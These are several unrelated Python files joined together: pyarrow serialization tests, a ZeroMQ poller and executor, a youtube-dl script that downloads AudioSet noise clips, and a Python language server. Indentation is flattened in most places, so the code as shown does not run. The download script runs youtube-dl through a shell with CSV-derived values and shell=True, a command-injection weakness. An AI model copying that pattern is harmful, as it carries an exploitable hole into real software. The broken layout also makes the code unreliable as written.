context.register_type(Baz, "Baz")
context.register_type(Qux, "Quz")
context.register_type(SubQux, "SubQux")
context.register_type(SubQuxPickle, "SubQuxPickle", pickle=True)
context.register_type(Exception, "Exception")
context.register_type(CustomError, "CustomError")
context.register_type(Point, "Point")
context.register_type(NamedTupleExample, "NamedTupleExample")
return context
global_serialization_context = make_serialization_context()
def serialization_roundtrip(value, scratch_buffer,
context=global_serialization_context):
writer = pa.FixedSizeBufferWriter(scratch_buffer)
pa.serialize_to(value, writer, context=context)
reader = pa.BufferReader(scratch_buffer)
result = pa.deserialize_from(reader, None, context=context)
assert_equal(value, result)
_check_component_roundtrip(value, context=context)
def _check_component_roundtrip(value, context=global_serialization_context):
# Test to/from components
serialized = pa.serialize(value, context=context)
components = serialized.to_components()
from_comp = pa.SerializedPyObject.from_components(components)
recons = from_comp.deserialize(context=context)
assert_equal(value, recons)
@pytest.fixture(scope='session')
def large_buffer(size=32*1024*1024):
return pa.allocate_buffer(size)
def large_memory_map(tmpdir_factory, size=100*1024*1024):
path = (tmpdir_factory.mktemp('data')
.join('pyarrow-serialization-tmp-file').strpath)
# Create a large memory mapped file
with open(path, 'wb') as f:
f.write(np.random.randint(0, 256, size=size)
.astype('u1')
.tobytes()
[:size])
return path
def test_clone():
context = pa.SerializationContext()
class Foo(object):
pass
def custom_serializer(obj):
return 0
def custom_deserializer(serialized_obj):
return (serialized_obj, 'a')
context.register_type(Foo, 'Foo', custom_serializer=custom_serializer,
custom_deserializer=custom_deserializer)
new_context = context.clone()
f = Foo()
serialized = pa.serialize(f, context=context)
deserialized = serialized.deserialize(context=context)
assert deserialized == (0, 'a')
serialized = pa.serialize(f, context=new_context)
deserialized = serialized.deserialize(context=new_context)
assert deserialized == (0, 'a')
def test_primitive_serialization(large_buffer):
for obj in PRIMITIVE_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_integer_limits(large_buffer):
# Check that Numpy scalars can be represented up to their limit values
# (except np.uint64 which is limited to 2**63 - 1)
    for dt in [np.int8, np.int16, np.int32, np.int64,
               np.uint8, np.uint16, np.uint32, np.uint64]:
scal = dt(np.iinfo(dt).min)
serialization_roundtrip(scal, large_buffer)
if dt is not np.uint64:
scal = dt(np.iinfo(dt).max)
serialization_roundtrip(scal, large_buffer)
else:
scal = dt(2**63 - 1)
serialization_roundtrip(scal, large_buffer)
for v in (2**63, 2**64 - 1):
scal = dt(v)
with pytest.raises(pa.ArrowInvalid):
pa.serialize(scal)
def test_serialize_to_buffer():
for nthreads in [1, 4]:
for value in COMPLEX_OBJECTS:
buf = pa.serialize(value).to_buffer(nthreads=nthreads)
result = pa.deserialize(buf)
assert_equal(value, result)
def test_complex_serialization(large_buffer):
for obj in COMPLEX_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_custom_serialization(large_buffer):
for obj in CUSTOM_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_default_dict_serialization(large_buffer):
pytest.importorskip("cloudpickle")
obj = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
serialization_roundtrip(obj, large_buffer)
def test_numpy_serialization(large_buffer):
for t in ["bool", "int8", "uint8", "int16", "uint16", "int32",
"uint32", "float16", "float32", "float64", "<U1", "<U2", "<U3",
"<U4", "|S1", "|S2", "|S3", "|S4", "|O"]:
obj = np.random.randint(0, 10, size=(100, 100)).astype(t)
serialization_roundtrip(obj, large_buffer)
obj = obj[1:99, 10:90]
serialization_roundtrip(obj, large_buffer)
def test_datetime_serialization(large_buffer):
data = [
# Principia Mathematica published
datetime.datetime(year=1687, month=7, day=5),
# Some random date
datetime.datetime(year=1911, month=6, day=3, hour=4,
minute=55, second=44),
# End of WWI
datetime.datetime(year=1918, month=11, day=11),
# Beginning of UNIX time
datetime.datetime(year=1970, month=1, day=1),
# The Berlin wall falls
datetime.datetime(year=1989, month=11, day=9),
# Another random date
datetime.datetime(year=2011, month=6, day=3, hour=4,
minute=0, second=3),
# Another random date
datetime.datetime(year=1970, month=1, day=3, hour=4,
minute=0, second=0)
]
for d in data:
serialization_roundtrip(d, large_buffer)
def test_torch_serialization(large_buffer):
pytest.importorskip("torch")
serialization_context = pa.default_serialization_context()
pa.register_torch_serialization_handlers(serialization_context)
# These are the only types that are supported for the
# PyTorch to NumPy conversion
for t in ["float32", "float64",
"uint8", "int16", "int32", "int64"]:
obj = torch.from_numpy(np.random.randn(1000).astype(t))
serialization_roundtrip(obj, large_buffer,
context=serialization_context)
tensor_requiring_grad = torch.randn(10, 10, requires_grad=True)
serialization_roundtrip(tensor_requiring_grad, large_buffer,
context=serialization_context)
@pytest.mark.skipif(not torch or not torch.cuda.is_available(),
reason="requires pytorch with CUDA")
def test_torch_cuda():
# ARROW-2920: This used to segfault if torch is not imported
# before pyarrow
# Note that this test will only catch the issue if it is run
# with a pyarrow that has been built in the manylinux1 environment
torch.nn.Conv2d(64, 2, kernel_size=3, stride=1,
padding=1, bias=False).cuda()
def test_numpy_immutable(large_buffer):
obj = np.zeros([10])
writer = pa.FixedSizeBufferWriter(large_buffer)
pa.serialize_to(obj, writer, global_serialization_context)
reader = pa.BufferReader(large_buffer)
result = pa.deserialize_from(reader, None, global_serialization_context)
with pytest.raises(ValueError):
result[0] = 1.0
def test_numpy_base_object(tmpdir):
# ARROW-2040: deserialized Numpy array should keep a reference to the
# owner of its memory
path = os.path.join(str(tmpdir), 'zzz.bin')
data = np.arange(12, dtype=np.int32)
with open(path, 'wb') as f:
f.write(pa.serialize(data).to_buffer())
serialized = pa.read_serialized(pa.OSFile(path))
result = serialized.deserialize()
assert_equal(result, data)
serialized = None
assert_equal(result, data)
assert result.base is not None
# see https://issues.apache.org/jira/browse/ARROW-1695
def test_serialization_callback_numpy():
class DummyClass(object):
pass
def serialize_dummy_class(obj):
x = np.zeros(4)
return x
def deserialize_dummy_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(DummyClass, "DummyClass",
custom_serializer=serialize_dummy_class,
custom_deserializer=deserialize_dummy_class)
pa.serialize(DummyClass(), context=context)
def test_numpy_subclass_serialization():
# Check that we can properly serialize subclasses of np.ndarray.
class CustomNDArray(np.ndarray):
def __new__(cls, input_array):
array = np.asarray(input_array).view(cls)
return array
def serializer(obj):
return {'numpy': obj.view(np.ndarray)}
def deserializer(data):
array = data['numpy'].view(CustomNDArray)
return array
context = pa.default_serialization_context()
context.register_type(CustomNDArray, 'CustomNDArray',
custom_serializer=serializer,
custom_deserializer=deserializer)
x = CustomNDArray(np.zeros(3))
serialized = pa.serialize(x, context=context).to_buffer()
new_x = pa.deserialize(serialized, context=context)
assert type(new_x) == CustomNDArray
assert np.alltrue(new_x.view(np.ndarray) == np.zeros(3))
def test_pyarrow_objects_serialization(large_buffer):
    # NOTE: We have to create these objects inside the test function,
    # or they will affect 'test_total_bytes_allocated'.
    pyarrow_objects = [
        pa.array([1, 2, 3, 4]), pa.array(['1', u'never \U0001F631', '',
                                          u"233 * \U0001F600"]),
        pa.array([1, None, 2, 3]),
        pa.Tensor.from_numpy(np.random.rand(2, 3, 4)),
        pa.RecordBatch.from_arrays(
            [pa.array([1, None, 2, 3]),
             pa.array(['1', u'never \U0001F631', '', u"233 * \U0001F600"])],
            ['a', 'b']),
        pa.Table.from_arrays([pa.array([1, None, 2, 3]),
                              pa.array(['1', u'never \U0001F631', '',
                                        u"233 * \U0001F600"])],
                             ['a', 'b'])
    ]
for obj in pyarrow_objects:
serialization_roundtrip(obj, large_buffer)
def test_buffer_serialization():
class BufferClass(object):
pass
def serialize_buffer_class(obj):
return pa.py_buffer(b"hello")
def deserialize_buffer_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(
BufferClass, "BufferClass",
custom_serializer=serialize_buffer_class,
custom_deserializer=deserialize_buffer_class)
b = pa.serialize(BufferClass(), context=context).to_buffer()
assert pa.deserialize(b, context=context).to_pybytes() == b"hello"
@pytest.mark.skip(reason="extensive memory requirements")
def test_arrow_limits():
def huge_memory_map(temp_dir):
return large_memory_map(temp_dir, 100 * 1024 * 1024 * 1024)
with pa.memory_map(huge_memory_map, mode="r+") as mmap:
# Test that objects that are too large for Arrow throw a Python
# exception. These tests give out of memory errors on Travis and need
# to be run on a machine with lots of RAM.
x = 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * ["s"]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [["1"], 2, 3, [{"s": 4}]]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [{"s": 1}] + 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = np.zeros(2 ** 25)
serialization_roundtrip(x, mmap)
del x
x = [np.zeros(2 ** 18) for _ in range(2 ** 7)]
serialization_roundtrip(x, mmap)
del x
def test_serialization_callback_error():
class TempClass(object):
pass
# Pass a SerializationContext into serialize, but TempClass
# is not registered
serialization_context = pa.SerializationContext()
val = TempClass()
with pytest.raises(pa.SerializationCallbackError) as err:
serialized_object = pa.serialize(val, serialization_context)
assert err.value.example_object == val
serialization_context.register_type(TempClass, "TempClass")
serialized_object = pa.serialize(TempClass(), serialization_context)
deserialization_context = pa.SerializationContext()
# Pass a Serialization Context into deserialize, but TempClass
# is not registered
with pytest.raises(pa.DeserializationCallbackError) as err:
serialized_object.deserialize(deserialization_context)
assert err.value.type_id == "TempClass"
class TempClass2(object):
pass
# Make sure that we receive an error when we use an inappropriate value for
# the type_id argument.
with pytest.raises(TypeError):
serialization_context.register_type(TempClass2, 1)
def test_fallback_to_subclasses():
class SubFoo(Foo):
def __init__(self):
Foo.__init__(self)
# should be able to serialize/deserialize an instance
# if a base class has been registered
serialization_context = pa.SerializationContext()
serialization_context.register_type(Foo, "Foo")
subfoo = SubFoo()
# should fall back to the Foo serializer
serialized_object = pa.serialize(subfoo, serialization_context)
reconstructed_object = serialized_object.deserialize(
serialization_context
)
assert type(reconstructed_object) == Foo
class Serializable(object):
pass
def serialize_serializable(obj):
return {"type": type(obj), "data": obj.__dict__}
def deserialize_serializable(obj):
val = obj["type"].__new__(obj["type"])
val.__dict__.update(obj["data"])
return val
class SerializableClass(Serializable):
def __init__(self):
self.value = 3
def test_serialize_subclasses():
# This test shows how subclasses can be handled in an idiomatic way
# by having only a serializer for the base class
# This technique should however be used with care, since pickling
# type(obj) with cloudpickle will include the full class definition
# in the serialized representation.
# This means the class definition is part of every instance of the
# object, which in general is not desirable; registering all subclasses
# with register_type will result in faster and more memory
# efficient serialization.
context = pa.default_serialization_context()
context.register_type(
Serializable, "Serializable",
custom_serializer=serialize_serializable,
custom_deserializer=deserialize_serializable)
a = SerializableClass()
serialized = pa.serialize(a, context=context)
deserialized = serialized.deserialize(context=context)
assert type(deserialized).__name__ == SerializableClass.__name__
assert deserialized.value == 3
def test_serialize_to_components_invalid_cases():
buf = pa.py_buffer(b'hello')
components = {
'num_tensors': 0,
'num_ndarrays': 0,
'num_buffers': 1,
'data': [buf]
}
with pytest.raises(pa.ArrowInvalid):
pa.deserialize_components(components)
components = {
'num_tensors': 0,
'num_ndarrays': 1,
'num_buffers': 0,
'data': [buf, buf]
}
with pytest.raises(pa.ArrowInvalid):
pa.deserialize_components(components)
def test_serialize_read_concatenated_records():
# ARROW-1996 -- see stream alignment work in ARROW-2840, ARROW-3212
f = pa.BufferOutputStream()
pa.serialize_to(12, f)
pa.serialize_to(23, f)
buf = f.getvalue()
f = pa.BufferReader(buf)
pa.read_serialized(f).deserialize()
pa.read_serialized(f).deserialize()
@pytest.mark.skipif(os.name == 'nt', reason="deserialize_regex not pickleable")
def test_deserialize_in_different_process():
from multiprocessing import Process, Queue
import re
regex = re.compile(r"\d+\.\d*")
serialization_context = pa.SerializationContext()
serialization_context.register_type(type(regex), "Regex", pickle=True)
serialized = pa.serialize(regex, serialization_context)
serialized_bytes = serialized.to_buffer().to_pybytes()
def deserialize_regex(serialized, q):
import pyarrow as pa
q.put(pa.deserialize(serialized))
q = Queue()
p = Process(target=deserialize_regex, args=(serialized_bytes, q))
p.start()
assert q.get().pattern == regex.pattern
p.join()
def test_deserialize_buffer_in_different_process():
import tempfile
import subprocess
f = tempfile.NamedTemporaryFile(delete=False)
b = pa.serialize(pa.py_buffer(b'hello')).to_buffer()
f.write(b.to_pybytes())
f.close()
subprocess_env = test_util.get_modified_env_with_pythonpath()
dir_path = os.path.dirname(os.path.realpath(__file__))
python_file = os.path.join(dir_path, 'deserialize_buffer.py')
subprocess.check_call([sys.executable, python_file, f.name],
env=subprocess_env)
def test_set_pickle():
# Use a custom type to trigger pickling.
class Foo(object):
pass
context = pa.SerializationContext()
context.register_type(Foo, 'Foo', pickle=True)
test_object = Foo()
# Define a custom serializer and deserializer to use in place of pickle.
def dumps1(obj):
return b'custom'
def loads1(serialized_obj):
return serialized_obj + b' serialization 1'
# Test that setting a custom pickler changes the behavior.
context.set_pickle(dumps1, loads1)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 1'
# Define another custom serializer and deserializer.
def dumps2(obj):
return b'custom'
def loads2(serialized_obj):
return serialized_obj + b' serialization 2'
# Test that setting another custom pickler changes the behavior again.
context.set_pickle(dumps2, loads2)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 2'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="need Python 3.6")
def test_path_objects(tmpdir):
# Test compatibility with PEP 519 path-like objects
import pathlib
p = pathlib.Path(tmpdir) / 'zzz.bin'
obj = 1234
pa.serialize_to(obj, p)
res = pa.deserialize_from(p, None)
assert res == obj
def test_tensor_alignment():
# Deserialized numpy arrays should be 64-byte aligned.
x = np.random.normal(size=(10, 20, 30))
y = pa.deserialize(pa.serialize(x).to_buffer())
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i) for i in range(100)]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i * (1,)) for i in range(20)]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i * (5,)) for i in range(1, 8)]
xs = [xs[i][(i + 1) * (slice(1, 3),)] for i in range(len(xs))]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
def test_serialization_determinism():
for obj in COMPLEX_OBJECTS:
buf1 = pa.serialize(obj).to_buffer()
buf2 = pa.serialize(obj).to_buffer()
assert buf1.to_pybytes() == buf2.to_pybytes()
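# A hedged recap of the register_type / serialize / deserialize pattern the
# tests above exercise (legacy pyarrow serialization API; the Point class and
# helper name below are illustrative only):
def _example_context_roundtrip():
    class Point(object):
        def __init__(self, x, y):
            self.x, self.y = x, y

    context = pa.SerializationContext()
    context.register_type(
        Point, 'Point',
        custom_serializer=lambda p: {'x': p.x, 'y': p.y},
        custom_deserializer=lambda d: Point(d['x'], d['y']))
    buf = pa.serialize(Point(1, 2), context=context).to_buffer()
    restored = pa.deserialize(buf, context=context)
    assert (restored.x, restored.y) == (1, 2)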
|
zmq_poller.py
|
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import multiprocessing
import six
@six.add_metaclass(abc.ABCMeta)
class ZmqPoller(object):
"""Base poller interface
Needed to poll on zmq sockets in green and native async manner.
Native poller implementation wraps zmq.Poller helper class.
Wrapping is needed to provide unified poller interface
in zmq-driver (for both native and zmq pollers). It makes some
difference with poller-helper from zmq library which doesn't actually
receive message.
The poller object should be obtained over:
poller = zmq_async.get_poller()
Then we have to register sockets for polling. We are able
to provide specific receiving method. By default poller calls
socket.recv_multipart.
def receive_message(socket):
id = socket.recv_string()
ctxt = socket.recv_json()
msg = socket.recv_json()
return (id, ctxt, msg)
poller.register(socket, recv_method=receive_message)
Further to receive a message we should call:
message, socket = poller.poll()
The 'message' here contains (id, ctxt, msg) tuple.
"""
@abc.abstractmethod
def register(self, socket, recv_method=None):
"""Register socket to poll
:param socket: Socket to subscribe for polling
:type socket: zmq.Socket
:param recv_method: Optional specific receiver procedure
Should return received message object
:type recv_method: callable
"""
@abc.abstractmethod
def poll(self, timeout=None):
"""Poll for messages
:param timeout: Optional polling timeout
None or -1 means poll forever
any positive value means timeout in seconds
:type timeout: int
:returns: (message, socket) tuple
"""
@abc.abstractmethod
def close(self):
"""Terminate polling"""
def resume_polling(self, socket):
"""Resume with polling
Some implementations of poller may provide hold polling before reply
This method is intended to excplicitly resume polling aftewards.
"""
@six.add_metaclass(abc.ABCMeta)
class Executor(object):
"""Base executor interface for threading/green async executors"""
def __init__(self, thread):
self.thread = thread
@abc.abstractmethod
def execute(self):
"""Run execution"""
@abc.abstractmethod
def stop(self):
"""Stop execution"""
@abc.abstractmethod
def wait(self):
"""Wait until pass"""
@abc.abstractmethod
def done(self):
"""More soft way to stop rather than killing thread"""
class MultiprocessingExecutor(Executor):
def __init__(self, method):
process = multiprocessing.Process(target=self._loop)
self._method = method
# stop event used by _loop, stop and done; it was missing originally
self._stop = multiprocessing.Event()
super(MultiprocessingExecutor, self).__init__(process)
def _loop(self):
while not self._stop.is_set():
self._method()
def execute(self):
self.thread.start()
def stop(self):
self._stop.set()
def wait(self):
self.thread.join()
def done(self):
self._stop.set()
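# A hedged usage sketch for the executor above (illustrative only; relies on
# fork-style process start so the bound method and stop event are inherited).
def _example_executor_usage(poller):
    def work():
        message, socket = poller.poll(timeout=1)

    executor = MultiprocessingExecutor(work)
    executor.execute()  # starts the child-process loop
    executor.stop()     # sets the stop event; the loop exits
    executor.wait()     # joins the child process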
|
download_youtube_noise.py
|
"""
:author:
Paul Bethge (bethge@zkm.de)
2021
:License:
This package is published under Simplified BSD License.
"""
"""
A small script for downloading audio files from the "audioset" dataset using youtube-dl and ffmpeg
The list of files is passed as unbalanced_train_segments.csv
Unfortunately, the balanced_train_segments.csv has a slightly different style
Labels can be ignored by adding them to the restrictions list
"""
import os
import argparse
import threading
import subprocess
from queue import Queue
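# A hedged helper sketch showing how one row of unbalanced_train_segments.csv
# is interpreted by the main loop below: "YTID, start_seconds, end_seconds,
# quoted label list". Illustrative only; the script parses lines inline and
# never calls this function.
def parse_segment_line(line):
    fields = line.rstrip('\n').split(',')
    yt_id = fields[0]           # e.g. the 11-character video id
    start_s = float(fields[1])
    end_s = float(fields[2])
    # the label list is quoted and itself comma-separated, so it spills
    # over the remaining fields; strip the stray quotes
    labels = [f.strip().strip('"') for f in fields[3:]]
    return yt_id, start_s, end_s, labels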
def downloadEnclosures(i, q):
while True:
try:
yt_url, start_s, length_s, output_dir = q.get()
download(yt_url, start_s, length_s, output_dir)
except Exception as e:
print("Download oopsi: ", e)
q.task_done()
def download(yt_url, start_s, length_s, output_dir):
command = """youtube-dl {} --extract-audio --audio-format wav -o "{}/%(title)s.%(ext)s" --postprocessor-args '-ss {} -t {} -ac 1 -ar 16000' """.format(yt_url, output_dir, start_s, length_s)
subprocess.call(command, shell=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--input_file', type=str,
required=True,
help="path to the unbalanced_train_segments.csv")
parser.add_argument('--output_dir', type=str,
default=os.path.join(os.getcwd(), "yt-noise"),
help="path to the output directory")
parser.add_argument('--num_threads', type=int,
default=8,
help="amount of worker threads")
parser.add_argument('--downloads', type=int,
default=100000,
help="amount of audio pieces to download")
args = parser.parse_args()
# worker queue
queue = Queue()
# create workers
for i in range(args.num_threads):
worker = threading.Thread(target=downloadEnclosures, args=(i, queue,), daemon=True)
worker.start()
# labels of audioset that should not be considered "noise"
# for example: human speech, singing
# labels taken from ontology.json ()
restrictions = [
### human sounds ###
# "/m/09l8g", # Human voice
"/m/09x0r", # Speech
"/m/05zppz", "/m/02zsn", "/m/0ytgt", "/m/01h8n0", "/m/02qldy", "/m/0261r1", "/m/0brhx",
"/m/02rtxlg", # whispering
"/m/015lz1", # singing
"/m/0l14jd", "/m/01swy6", "/m/02bk07", "/t/dd00003", "/t/dd00004", "/t/dd00005", "/t/dd00006", "/m/06bxc",
#### Music ###
"/m/05lls", # opera
"/m/0y4f8", # vocal music
"/m/0z9c", "/m/02cz_7",
]
# labels of audioset that should be considered "noise"
# for example: laughing, human locomotion
positives = [
### human sounds ###
"/m/0bpl036", # human locomotion
"/m/06h7j", "/m/07qv_x_", "/m/07pbtc8",
"/m/0k65p", # hands
"/m/025_jnm", "/m/0l15bq",
"/t/dd00012", # human group actions
"/m/0l15bq", # clapping
"/m/053hz1", # cheering
"/m/028ght", # applause
"/m/07rkbfh", # chatter
"/m/03qtwd", # crowd
"/m/07qfr4h", # speech noise
"/m/04v5dt", # Booing
"/t/dd00013", # Children playing
"/t/dd00135", # Children shouting
"/m/0463cq4", # crying
"/t/dd00002", "/m/07qz6j3",
"/m/02fxyj", # Humming
"/m/07s2xch", # Groan
"/m/07r4k75", # Grunt
"/m/01j423", # Yawn
"/m/07qw_06", # wail, moan
"/m/07plz5l", # sigh
"/m/01w250", # whistling
"/m/09hlz4", # respiratory sounds
"/m/0lyf6", # breathing
"/m/07mzm6", "/m/01d3sd", "/m/07s0dtb", "/m/07pyy8b", "/m/07q0yl5",
"/m/01hsr_", # sneeze
"/m/07ppn3j", # sniff
"/m/01b_21", # cough
"/m/0dl9sf8", # throat clearing
"/m/07p6fty", # shout
"/m/07q4ntr", # bellow
"/m/07rwj3x", # whoop
"/m/07sr1lc", # yell
"/m/04gy_2", # battle_cry
"/t/dd00135", # children shouting
"/m/03qc9zr", # screaming
"/m/01j3sz", # laughter
"/t/dd00001", "/m/07r660_", "/m/07s04w4", "/m/07sq110", "/m/07rgt08",
"/m/02p3nc" # hiccup
]
# open Youtube's dataset file
with open(args.input_file) as f:
# run for a certain number of downloads
num_files = args.downloads
file_count = 0
try:
# skip the first three lines
print(f.readline())
print(f.readline())
f.readline()
# as long as we didn't reach the maximum number of files
while file_count < num_files:
# get a line
line = f.readline()[:-1].split(',')
# if the line is not empty
if line[0] != "":
# get the URL and start and end points
URL = "https://www.youtube.com/watch?v=" + line[0]
start = float(line[1])
end = float(line[2])
audio_length = end - start
# get the labels from csv and clean them up
labels = []
rest = line[3:]
for i, label in enumerate(rest):
if i == 0:
label = label[2:]
if i == len(rest)-1:
label = label[:-1]
labels.append(label)
# apply label restrictions
if any(label in labels for label in restrictions):
# print("Found restricted label in {}".format(labels))
continue
if not any(label in labels for label in positives):
# print("Label not in positives!")
continue
# print("Something in {} is important and nothing restricted". format(labels))
# get the data and save it
function_args = (URL, start, audio_length, args.output_dir)
queue.put(function_args)
file_count += 1
else:
print("Nothing left!")
break
except EOFError as e:
print("End of file!")
# wait until the workers are ready
print("Waiting for threads to finish... this may take hours")
queue.join()
|
python_ls.py
|
# Copyright 2017 Palantir Technologies, Inc.
import logging
import socketserver
import threading
from jsonrpc.dispatchers import MethodDispatcher
from jsonrpc.endpoint import Endpoint
from jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from . import lsp, _utils, uris
from .config import config
from .workspace import Workspace
log = logging.getLogger(__name__)
LINT_DEBOUNCE_S = 0.5 # 500 ms
PARENT_PROCESS_WATCH_INTERVAL = 10 # 10 s
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
# pylint: disable=no-member
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)
def handle(self):
self.delegate.start()
def start_tcp_lang_server(bind_addr, port, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError('Handler class must be a subclass of PythonLanguageServer')
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + 'Handler',
(_StreamHandlerWrapper,),
{'DELEGATE_CLASS': handler_class}
)
server = socketserver.TCPServer((bind_addr, port), wrapper_class)
try:
log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr, port)
server.serve_forever()
finally:
log.info('Shutting down')
server.server_close()
def start_io_lang_server(rfile, wfile, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError('Handler class must be a subclass of PythonLanguageServer')
log.info('Starting %s IO language server', handler_class.__name__)
server = handler_class(rfile, wfile)
server.start()
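# A hedged launch sketch (illustrative; the real entry point lives in the
# package's CLI module): serve the language server over stdio.
def _example_serve_stdio():
    import sys
    start_io_lang_server(sys.stdin.buffer, sys.stdout.buffer,
                         PythonLanguageServer)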
class PythonLanguageServer(MethodDispatcher):
""" Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
"""
# pylint: disable=too-many-public-methods,redefined-builtin
def __init__(self, rx, tx):
self.workspace = None
self.config = None
self._jsonrpc_stream_reader = JsonRpcStreamReader(rx)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(tx)
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write)
self._dispatchers = []
self._shutdown = False
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def __getitem__(self, item):
"""Override getitem to fallback through multiple dispatchers."""
if self._shutdown and item != 'exit':
# exit is the only allowed method during shutdown
log.debug("Ignoring non-exit method during shutdown: %s", item)
raise KeyError
try:
return super(PythonLanguageServer, self).__getitem__(item)
except KeyError:
# Fallback through extra dispatchers
for dispatcher in self._dispatchers:
try:
return dispatcher[item]
except KeyError:
continue
raise KeyError()
def m_shutdown(self, **_kwargs):
self._shutdown = True
return None
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def _hook(self, hook_name, doc_uri=None, **kwargs):
"""Calls hook_name and returns a list of results from all registered handlers"""
doc = self.workspace.get_document(doc_uri) if doc_uri else None
hook_handlers = self.config.plugin_manager.subset_hook_caller(hook_name, self.config.disabled_plugins)
return hook_handlers(config=self.config, workspace=self.workspace, document=doc, **kwargs)
def capabilities(self):
server_capabilities = {
'codeActionProvider': True,
'codeLensProvider': {
'resolveProvider': False, # We may need to make this configurable
},
'completionProvider': {
'resolveProvider': False, # We know everything ahead of time
'triggerCharacters': ['.']
},
'documentFormattingProvider': True,
'documentHighlightProvider': True,
'documentRangeFormattingProvider': True,
'documentSymbolProvider': True,
'definitionProvider': True,
'executeCommandProvider': {
'commands': flatten(self._hook('pyls_commands'))
},
'hoverProvider': True,
'referencesProvider': True,
'renameProvider': True,
'signatureHelpProvider': {
'triggerCharacters': ['(', ',']
},
'textDocumentSync': lsp.TextDocumentSyncKind.INCREMENTAL,
'experimental': merge(self._hook('pyls_experimental_capabilities'))
}
log.info('Server capabilities: %s', server_capabilities)
return server_capabilities
def m_initialize(self, processId=None, rootUri=None, rootPath=None, initializationOptions=None, **_kwargs):
log.debug('Language server initialized with %s %s %s %s', processId, rootUri, rootPath, initializationOptions)
if rootUri is None:
rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ''
self.workspace = Workspace(rootUri, self._endpoint)
self.config = config.Config(rootUri, initializationOptions or {}, processId)
self._dispatchers = self._hook('pyls_dispatchers')
self._hook('pyls_initialize')
if processId is not None:
def watch_parent_process(pid):
# exit when the given pid is not alive
if not _utils.is_process_alive(pid):
log.info("parent process %s is not alive", pid)
self.m_exit()
log.debug("parent process %s is still alive", pid)
# pass the callable and its args; calling watch_parent_process(pid) here would recurse immediately
threading.Timer(PARENT_PROCESS_WATCH_INTERVAL, watch_parent_process, args=[pid]).start()
watching_thread = threading.Thread(target=watch_parent_process, args=[processId])
watching_thread.daemon = True
watching_thread.start()
# Get our capabilities
return {'capabilities': self.capabilities()}
def m_initialized(self, **_kwargs):
pass
def code_actions(self, doc_uri, range, context):
return flatten(self._hook('pyls_code_actions', doc_uri, range=range, context=context))
def code_lens(self, doc_uri):
return flatten(self._hook('pyls_code_lens', doc_uri))
def completions(self, doc_uri, position):
completions = self._hook('pyls_completions', doc_uri, position=position)
return {
'isIncomplete': False,
'items': flatten(completions)
}
def definitions(self, doc_uri, position):
return flatten(self._hook('pyls_definitions', doc_uri, position=position))
def document_symbols(self, doc_uri):
return flatten(self._hook('pyls_document_symbols', doc_uri))
def execute_command(self, command, arguments):
return self._hook('pyls_execute_command', command=command, arguments=arguments)
def format_document(self, doc_uri):
return self._hook('pyls_format_document', doc_uri)
def format_range(self, doc_uri, range):
return self._hook('pyls_format_range', doc_uri, range=range)
def highlight(self, doc_uri, position):
return flatten(self._hook('pyls_document_highlight', doc_uri, position=position)) or None
def hover(self, doc_uri, position):
return self._hook('pyls_hover', doc_uri, position=position) or {'contents': ''}
@_utils.debounce(LINT_DEBOUNCE_S, keyed_by='doc_uri')
def lint(self, doc_uri):
# Since we're debounced, the document may no longer be open
if doc_uri in self.workspace.documents:
self.workspace.publish_diagnostics(doc_uri, flatten(self._hook('pyls_lint', doc_uri)))
def references(self, doc_uri, position, exclude_declaration):
return flatten(self._hook(
'pyls_references', doc_uri, position=position,
exclude_declaration=exclude_declaration
))
def rename(self, doc_uri, position, new_name):
return self._hook('pyls_rename', doc_uri, position=position, new_name=new_name)
def signature_help(self, doc_uri, position):
return self._hook('pyls_signature_help', doc_uri, position=position)
def m_text_document__did_close(self, textDocument=None, **_kwargs):
self.workspace.rm_document(textDocument['uri'])
